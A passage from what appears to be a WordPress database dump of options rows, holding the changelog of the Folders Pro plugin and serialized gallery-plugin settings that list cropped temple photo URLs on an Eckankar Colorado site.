\\/>\\nClass name bug fixed<\\/p>\\n<p>= 2.5.9 =<br \\/>\\nWe\'ve significantly improved the drag and drop experience (and we\'ve also fixed some bugs)<\\/p>\\n<p>= 2.5.8 =<br \\/>\\nFolders settings checkbox bug fix and some other minor bugs were fixed<\\/p>\\n<p>= 2.5.7 =<br \\/>\\nQuick edit and search folder fix<\\/p>\\n<p>= 2.5.6 =<br \\/>\\nCSS bug fixed<\\/p>\\n<p>= 2.5.4 =<br \\/>\\nVarious bugs were fixed after our last major release<\\/p>\\n<p>= 2.5.3 =<br \\/>\\nNew and better design! We\'ve added a search field, the minimum size of the Folders area is much smaller now, we\'ve added Folders to the add media view, added a duplicate option, and many other cool features and bug fixes.<\\/p>\\n<p>= 2.5.2 =<br \\/>\\nSort your folders based on name and creation date. We\'ve also added some usability improvements, fixed some WPML and Polylang issue, and fixed some bugs<\\/p>\\n<p>= 2.5.1 =<\\/p>\\n<p>Sticky folders - pin your favorite folders to the folders\' navigation bar. When you use a media library folder in pages and posts, your choice will be stored for the next uses. We\'ve also fixed some RTL UI issues. You can also remove the upper folders if you want. We\'ve added an option to bulk move files in the media library in list mode (not using drag and drop).<\\/p>\\n<p>= 2.5 =<br \\/>\\nThe Add new page of the media library is not connected to Folders<\\/p>\\n<p>= 2.4.9 =<br \\/>\\nPages and posts count fix<\\/p>\\n<p>= 2.4.8 =<br \\/>\\nFolders plugin now supports non-public custom post types<\\/p>\\n<p>= 2.4.7 =<br \\/>\\nFrom now on when you clone\\/edit\\/publish pages, posts and custom posts in a specific folder, you\'ll stay in that folder<\\/p>\\n<p>= 2.4.6 =<br \\/>\\nSmall bugs fixed including: folder filtering bugs (trash, draft etc), WooCommerce products duplicate bug, quick edit in folders, Media Library Assistant compatibility and more<\\/p>\\n<p>= 2.4.5 =<br \\/>\\nAdded a progress bar when you upload files to the media library folders. You can now track how many files were uploaded in real time. We\'ve also fixed a default folders bug.<\\/p>\\n<p>= 2.4.4 =<br \\/>\\nPHP 7.3 fix<\\/p>\\n<p>= 2.4.3 =<br \\/>\\nMove elements (media library, posts, pages, custom posts) to folders by selecting the element and selecting the relevant folder from our dropdown. Also added some UI improvements :)<\\/p>\\n<p>= 2.4.2 =<br \\/>\\nNew download folder as Zip feature<\\/p>\\n<p>= 2.4.1 =<br \\/>\\nPolylang media library fix<\\/p>\\n<p>= 2.4 =<br \\/>\\nFolder order when adding a media library file to posts\\/pages fix, infrastructure improvements, and license activation for none-ssl website support<\\/p>\\n<p>= 2.3.9 =<br \\/>\\nThrive Themes Architect bug fixed<\\/p>\\n<p>= 2.3.8 =<br \\/>\\nYou can bulk delete folders now. You can also create a new folder from the upload screen in the media library. We\'ve also fixed some bugs like Polylang compatibility bug, folders order bug, default folder bug, and other minor bugs.<\\/p>\\n<p>= 2.3.7 =<br \\/>\\nYou can customize the folders look and feel now: change colors, font, and size of folders. We\'ve also added some features to improve the easy-of-use like Enter key to create a new folder and more.<\\/p>\\n<p>= 2.3.6 =<br \\/>\\nWe\'ve added an indication for successful actions (like moving elements into a folder, changing folders names etc)<\\/p>\\n<p>= 2.3.5 =<br \\/>\\nSelect a default folder for your media library, pages, posts, and custom posts. We\'ve also added a knowledge base with all FAQs.<\\/p>\\n<p>= 2.3.4 =<br \\/>\\nList view bulk moving bug fix<\\/p>\\n<p>= 2.3.3 =<br \\/>\\nDropdown bug fix<\\/p>\\n<p>= 2.3.2 =<br \\/>\\nBetter folder drag and drop<\\/p>\\n<p>= 2.3.1 =<br \\/>\\nBug fixes<\\/p>\\n<p>= 2.3 =<br \\/>\\nFolders is much faster and smoother now. We\'ve also fixed a media library resolution bug for Mac+Safari<\\/p>\\n<p>= 2.2.9 =<br \\/>\\nClass variable folder fixes<\\/p>\\n<p>= 2.2.8 =<br \\/>\\nJavascript functionality conflict<\\/p>\\n<p>= 2.2.7 =<br \\/>\\n* Fixed another\\u00a0sweetalert issue<\\/p>\\n<p>= 2.2.6 =<br \\/>\\n* Replaced sweetalert to avoid conflicts with other plugins<\\/p>\\n<p>= 2.2.5 =<br \\/>\\n* Minor license key activation bug<\\/p>\\n<p>= 2.2.4 =<br \\/>\\n* Fixed collapsed menu state bug<\\/p>\\n\"},\"banners\":{\"high\":\"\",\"low\":\"\"},\"icons\":{\"1x\":\"https:\\/\\/go.premio.io\\/wp-content\\/uploads\\/edd\\/2022\\/05\\/folders-128x128.gif\",\"2x\":\"https:\\/\\/go.premio.io\\/wp-content\\/uploads\\/edd\\/2022\\/05\\/folders.gif\"},\"description\":[\"\"],\"changelog\":[\"<p>= 2.9.9 =<br \\/>\\nDB bug fixed<\\/p>\\n<p>= 2.9.8 =<br \\/>\\nThrive Themes bug fixed<\\/p>\\n<p>= 2.9.7 =<br \\/>\\nChanged shortcut for creating a new folder (Gutenberg conflict resolved)<\\/p>\\n<p>= 2.9.6 =<br \\/>\\nScroll bug fix<\\/p>\\n<p>= 2.9.5 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.8.8 =<br \\/>\\n- Infrastructure improvements - Folders works faster now<br \\/>\\n- Added Folders support for Plugins<br \\/>\\n- WooCommerce product support for Dynamic Folders<br \\/>\\n- Added support for LMS LearnPress plugin<br \\/>\\n- Bugs fixed<\\/p>\\n<p>= 2.8.7 =<br \\/>\\n- Media library files url bug fixed<br \\/>\\n- Notification background bug fixed<\\/p>\\n<p>= 2.8.6 =<br \\/>\\n- Folders user access management - advanced folders access management for your team with roles that restrict their access to view and edit your website\\u2019s folders (Pro feature)<br \\/>\\n- New folders will be added to the top of the folders list<br \\/>\\n- We\\u2019ve improved folders compatibility with the WPML plugin and MailPoet<br \\/>\\n- Fixed a notice for PHP 8.0<br \\/>\\n- BuddyBoss items count bug fixed<br \\/>\\n- WebP Express bug fixed<br \\/>\\n- Media replace works fine with SVG and WebP files now<br \\/>\\n- Download folder as a ZIP bug fixed for big folders<\\/p>\\n<p>= 2.8.5 =<br \\/>\\nFolders import bug fixed<\\/p>\\n<p>= 2.8.4 =<br \\/>\\n- We\'ve added a horizontal scroll to the folders view<br \\/>\\n- Importing folders works better and faster now, the same goes for uploading folders and media library scan for used files<br \\/>\\n- Published\\/Drafts view works for specific folders too<br \\/>\\n- Fixed some bugs<\\/p>\\n<p>= 2.8.3 =<br \\/>\\nTexts changed<\\/p>\\n<p>= 2.8.2 =<br \\/>\\nAdded a \\\"Size\\\" column to the Media Cleaning feature and fixed a keyboard shortcuts bug<\\/p>\\n<p>= 2.8.1 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.8 =<br \\/>\\nAdded the option to clean unused media library files<br \\/>\\nAdded keyboard shortcuts<br \\/>\\nWhen you activate your license key it\'ll be hidden, a great feature for agencies that don\'t want to expose their license key to customers<br \\/>\\nFixed some bugs :)<\\/p>\\n<p>= 2.7.8 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.7.7 =<br \\/>\\nDivi bug fixed<\\/p>\\n<p>= 2.7.6 =<br \\/>\\nPerformance improvements<\\/p>\\n<p>= 2.7.5 =<br \\/>\\nReplace media bugs fixed<\\/p>\\n<p>= 2.7.4 =<br \\/>\\nWordPress 5.8 compatibility<\\/p>\\n<p>= 2.7.3 =<br \\/>\\nWe\'ve added the following features:<\\/p>\\n<p>Action bar that\'ll help you cut\\/copy\\/paste folders.<br \\/>\\nUpload folders directly from your computer now and keep the same local structure of folders.<br \\/>\\nRecycle bin feature to the media library.<br \\/>\\nLock\\/unlock all folders with the click of a button.<br \\/>\\nFolders restrictions based on the user who created the folder.<\\/p>\\n<p>We\'ve also added some UI improvements to make the usability as smooth as possible.<\\/p>\\n<p>= 2.7.2 =<br \\/>\\nDynamic folders bug fixed<\\/p>\\n<p>= 2.7.1 =<br \\/>\\nDynamic folders, auto rename files feature, undo your last action, advanced media replace features, and fixed some bugs<\\/p>\\n<p>= 2.7 =<br \\/>\\nWe fixed the issue where metadata details on hover could not be disabled<\\/p>\\n<p>= 2.6.9 =<br \\/>\\nLock folders, on-hover data for media library files, more file-type support for the media replacement functionality, and somebug fixes<\\/p>\\n<p>= 2.6.8 =<br \\/>\\nList view folders bulk actions bug fixed<\\/p>\\n<p>= 2.6.7 =<br \\/>\\nBugs fixed<\\/p>\\n<p>= 2.6.6 =<br \\/>\\nBugs fixed + more import options<\\/p>\\n<p>= 2.6.5 =<br \\/>\\niPad bugs fixed<\\/p>\\n<p>= 2.6.4 =<br \\/>\\nReplace media feature, import option (FileBird, Enhanced Media Library, Wicked Folders, Real Media Library, and WP Media Folder), create multiple folders at once (comma separated), option to hide Folders settings from the main menu, bug fixed<\\/p>\\n<p>= 2.6.3 =<br \\/>\\nWordPress 5.6 compatibility + Visual composer overlapping bug fixed<\\/p>\\n<p>= 2.6.2 =<br \\/>\\nVarious bugs fixed<\\/p>\\n<p>= 2.6.1 =<br \\/>\\nGallery related bugs and items-counter issues were fixed<\\/p>\\n<p>= 2.6 =<br \\/>\\nClass name bug fixed<\\/p>\\n<p>= 2.5.9 =<br \\/>\\nWe\'ve significantly improved the drag and drop experience (and we\'ve also fixed some bugs)<\\/p>\\n<p>= 2.5.8 =<br \\/>\\nFolders settings checkbox bug fix and some other minor bugs were fixed<\\/p>\\n<p>= 2.5.7 =<br \\/>\\nQuick edit and search folder fix<\\/p>\\n<p>= 2.5.6 =<br \\/>\\nCSS bug fixed<\\/p>\\n<p>= 2.5.4 =<br \\/>\\nVarious bugs were fixed after our last major release<\\/p>\\n<p>= 2.5.3 =<br \\/>\\nNew and better design! We\'ve added a search field, the minimum size of the Folders area is much smaller now, we\'ve added Folders to the add media view, added a duplicate option, and many other cool features and bug fixes.<\\/p>\\n<p>= 2.5.2 =<br \\/>\\nSort your folders based on name and creation date. We\'ve also added some usability improvements, fixed some WPML and Polylang issue, and fixed some bugs<\\/p>\\n<p>= 2.5.1 =<\\/p>\\n<p>Sticky folders - pin your favorite folders to the folders\' navigation bar. When you use a media library folder in pages and posts, your choice will be stored for the next uses. We\'ve also fixed some RTL UI issues. You can also remove the upper folders if you want. We\'ve added an option to bulk move files in the media library in list mode (not using drag and drop).<\\/p>\\n<p>= 2.5 =<br \\/>\\nThe Add new page of the media library is not connected to Folders<\\/p>\\n<p>= 2.4.9 =<br \\/>\\nPages and posts count fix<\\/p>\\n<p>= 2.4.8 =<br \\/>\\nFolders plugin now supports non-public custom post types<\\/p>\\n<p>= 2.4.7 =<br \\/>\\nFrom now on when you clone\\/edit\\/publish pages, posts and custom posts in a specific folder, you\'ll stay in that folder<\\/p>\\n<p>= 2.4.6 =<br \\/>\\nSmall bugs fixed including: folder filtering bugs (trash, draft etc), WooCommerce products duplicate bug, quick edit in folders, Media Library Assistant compatibility and more<\\/p>\\n<p>= 2.4.5 =<br \\/>\\nAdded a progress bar when you upload files to the media library folders. You can now track how many files were uploaded in real time. We\'ve also fixed a default folders bug.<\\/p>\\n<p>= 2.4.4 =<br \\/>\\nPHP 7.3 fix<\\/p>\\n<p>= 2.4.3 =<br \\/>\\nMove elements (media library, posts, pages, custom posts) to folders by selecting the element and selecting the relevant folder from our dropdown. Also added some UI improvements :)<\\/p>\\n<p>= 2.4.2 =<br \\/>\\nNew download folder as Zip feature<\\/p>\\n<p>= 2.4.1 =<br \\/>\\nPolylang media library fix<\\/p>\\n<p>= 2.4 =<br \\/>\\nFolder order when adding a media library file to posts\\/pages fix, infrastructure improvements, and license activation for none-ssl website support<\\/p>\\n<p>= 2.3.9 =<br \\/>\\nThrive Themes Architect bug fixed<\\/p>\\n<p>= 2.3.8 =<br \\/>\\nYou can bulk delete folders now. You can also create a new folder from the upload screen in the media library. We\'ve also fixed some bugs like Polylang compatibility bug, folders order bug, default folder bug, and other minor bugs.<\\/p>\\n<p>= 2.3.7 =<br \\/>\\nYou can customize the folders look and feel now: change colors, font, and size of folders. We\'ve also added some features to improve the easy-of-use like Enter key to create a new folder and more.<\\/p>\\n<p>= 2.3.6 =<br \\/>\\nWe\'ve added an indication for successful actions (like moving elements into a folder, changing folders names etc)<\\/p>\\n<p>= 2.3.5 =<br \\/>\\nSelect a default folder for your media library, pages, posts, and custom posts. We\'ve also added a knowledge base with all FAQs.<\\/p>\\n<p>= 2.3.4 =<br \\/>\\nList view bulk moving bug fix<\\/p>\\n<p>= 2.3.3 =<br \\/>\\nDropdown bug fix<\\/p>\\n<p>= 2.3.2 =<br \\/>\\nBetter folder drag and drop<\\/p>\\n<p>= 2.3.1 =<br \\/>\\nBug fixes<\\/p>\\n<p>= 2.3 =<br \\/>\\nFolders is much faster and smoother now. We\'ve also fixed a media library resolution bug for Mac+Safari<\\/p>\\n<p>= 2.2.9 =<br \\/>\\nClass variable folder fixes<\\/p>\\n<p>= 2.2.8 =<br \\/>\\nJavascript functionality conflict<\\/p>\\n<p>= 2.2.7 =<br \\/>\\n* Fixed another\\u00a0sweetalert issue<\\/p>\\n<p>= 2.2.6 =<br \\/>\\n* Replaced sweetalert to avoid conflicts with other plugins<\\/p>\\n<p>= 2.2.5 =<br \\/>\\n* Minor license key activation bug<\\/p>\\n<p>= 2.2.4 =<br \\/>\\n* Fixed collapsed menu state bug<\\/p>\\n\"],\"plugin\":\"folders-pro\\/folders.php\",\"id\":\"folders-pro\\/folders.php\"}\";}','no'),(58374,'grid_gallery_last_version','1.15.4','yes'),(58375,'sg_plugin_version','1.15.4','yes'),(58376,'widget_sggwidget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(58378,'sg_welcome_page_was_showed','1','yes'),(58380,'sgg_plug_welcome_show','1565990041','yes'),(58386,'showGalleryRevNotice','a:2:{s:4:\"date\";i:1565990298;s:8:\"is_shown\";b:1;}','yes'),(58395,'_sgg_final_crop','a:98:{s:20:\"125163-215-215-1-100\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-215x215.jpg\";s:19:\"125162-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_029-lg-1-215x215.jpg\";s:19:\"125161-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_027-lg-1-215x215.jpg\";s:19:\"125160-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_026-lg-1-215x215.jpg\";s:19:\"125159-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_025-lg-1-215x215.jpg\";s:19:\"125158-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_023-lg-1-215x215.jpg\";s:19:\"125157-215-215-100-\";s:93:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_023-A-lg-1-215x215.jpg\";s:19:\"125156-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_021-lg-1-215x215.jpg\";s:19:\"125155-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_020-lg-1-215x215.jpg\";s:19:\"125154-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_019-lg-1-215x215.jpg\";s:19:\"125153-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_018-lg-1-215x215.jpg\";s:19:\"125152-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_017-lg-1-215x215.jpg\";s:19:\"125151-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_016-lg-1-215x215.jpg\";s:19:\"125150-215-215-100-\";s:93:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_015-lg-o-1-215x215.jpg\";s:19:\"125149-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_014-lg-1-215x215.jpg\";s:19:\"125148-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_013-lg-1-215x215.jpg\";s:19:\"125147-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_012-lg-1-215x215.jpg\";s:19:\"125146-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_011-lg-1-215x215.jpg\";s:19:\"125145-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_009-lg-1-215x215.jpg\";s:19:\"125144-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_008-lg-1-215x215.jpg\";s:19:\"125143-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_007-lg-1-215x215.jpg\";s:19:\"125142-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_006-lg-1-215x215.jpg\";s:19:\"125141-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_005-lg-1-215x215.jpg\";s:19:\"125140-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_004-lg-1-215x215.jpg\";s:19:\"125139-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_003-lg-1-215x215.jpg\";s:19:\"125138-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_002-lg-1-215x215.jpg\";s:19:\"125137-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_001-lg-1-215x215.jpg\";s:19:\"125113-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_029-lg-215x215.jpg\";s:19:\"125112-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_027-lg-215x215.jpg\";s:19:\"125111-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_026-lg-215x215.jpg\";s:19:\"125110-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_025-lg-215x215.jpg\";s:19:\"125109-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_023-lg-215x215.jpg\";s:19:\"125108-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_023-A-lg-215x215.jpg\";s:19:\"125107-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_021-lg-215x215.jpg\";s:19:\"125106-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_020-lg-215x215.jpg\";s:19:\"125105-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_019-lg-215x215.jpg\";s:19:\"125104-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_018-lg-215x215.jpg\";s:19:\"125103-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_017-lg-215x215.jpg\";s:19:\"125102-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_016-lg-215x215.jpg\";s:19:\"125101-215-215-100-\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_015-lg-o-215x215.jpg\";s:19:\"125100-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_014-lg-215x215.jpg\";s:19:\"125099-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_013-lg-215x215.jpg\";s:19:\"125098-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_012-lg-215x215.jpg\";s:19:\"125097-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_011-lg-215x215.jpg\";s:19:\"125096-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_009-lg-215x215.jpg\";s:19:\"125095-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_008-lg-215x215.jpg\";s:19:\"125094-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_007-lg-215x215.jpg\";s:19:\"125093-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_006-lg-215x215.jpg\";s:19:\"125092-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_005-lg-215x215.jpg\";s:19:\"125091-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_004-lg-215x215.jpg\";s:19:\"125090-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_003-lg-215x215.jpg\";s:19:\"125089-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_002-lg-215x215.jpg\";s:19:\"125088-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_001-lg-215x215.jpg\";s:16:\"125653-155-100--\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_003-lg-155x100.jpg\";s:20:\"125653-215-215-1-100\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_003-lg-215x215.jpg\";s:19:\"165287-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_070-lg-215x215.jpg\";s:19:\"165286-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_069-lg-215x215.jpg\";s:19:\"165285-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_068-lg-215x215.jpg\";s:19:\"165284-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_067-lg-215x215.jpg\";s:19:\"165283-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_066-lg-215x215.jpg\";s:19:\"165282-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_065-lg-215x215.jpg\";s:19:\"165281-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_064-lg-215x215.jpg\";s:19:\"165280-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_063-lg-215x215.jpg\";s:19:\"165279-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_062-lg-215x215.jpg\";s:19:\"165278-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_061-lg-215x215.jpg\";s:19:\"165277-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_060-lg-215x215.jpg\";s:19:\"165276-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_059-lg-215x215.jpg\";s:19:\"165275-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_058-lg-215x215.jpg\";s:19:\"165274-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_057-lg-215x215.jpg\";s:19:\"165273-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_056-lg-215x215.jpg\";s:19:\"165272-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_055-lg-215x215.jpg\";s:19:\"165271-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_054-lg-215x215.jpg\";s:19:\"165270-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_053-lg-215x215.jpg\";s:19:\"165269-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_052-lg-215x215.jpg\";s:19:\"165268-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_051-lg-215x215.jpg\";s:19:\"165267-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_050-lg-215x215.jpg\";s:19:\"165266-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_049-lg-215x215.jpg\";s:19:\"165265-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_048-lg-215x215.jpg\";s:19:\"165264-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_047-lg-215x215.jpg\";s:19:\"165263-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_046-lg-215x215.jpg\";s:19:\"165262-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_045-lg-215x215.jpg\";s:19:\"165261-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_044-lg-215x215.jpg\";s:19:\"165260-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_043-lg-215x215.jpg\";s:19:\"165259-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_042-lg-215x215.jpg\";s:19:\"165258-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_041-lg-215x215.jpg\";s:19:\"165257-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_040-lg-215x215.jpg\";s:19:\"165256-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_039-lg-215x215.jpg\";s:19:\"165255-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_038-lg-215x215.jpg\";s:19:\"165254-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_037-lg-215x215.jpg\";s:19:\"165253-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_036-lg-215x215.jpg\";s:19:\"165252-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_035-lg-215x215.jpg\";s:19:\"165251-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_034-lg-215x215.jpg\";s:19:\"165250-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_033-lg-215x215.jpg\";s:19:\"165249-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_032-lg-215x215.jpg\";s:19:\"165248-215-215-100-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/09/ECK_Temple_CO_031-lg-215x215.jpg\";s:20:\"125677-215-215-1-100\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-215x215.jpg\";s:20:\"125677-155-100-true-\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-155x100.jpg\";s:19:\"124763-215-215-100-\";s:90:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_015-o-1-215x215.jpg\";}','yes'),(58396,'_sgg_crop','a:4:{s:16:\"125163-215-215-1\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-215x215.jpg\";s:16:\"125653-215-215-1\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_003-lg-215x215.jpg\";s:16:\"125677-215-215-1\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-215x215.jpg\";s:19:\"125677-155-100-true\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-155x100.jpg\";}','yes'),(58397,'_sgg_attach','a:126:{s:20:\"125163-215-215-1-100\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-215x215.jpg\";s:19:\"125163-215-215--100\";s:89:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_030-lg-215x215.jpg\";s:19:\"125162-215-215--100\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_029-lg-1-215x215.jpg\";s:19:\"125161-215-215--100\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08/ECK_Temple_CO_027-lg-1-215x215.jpg\";s:19:\"125160-215-215--100\";s:91:\"https://eckankar-colorado.org/wp-content/uploads/2019/08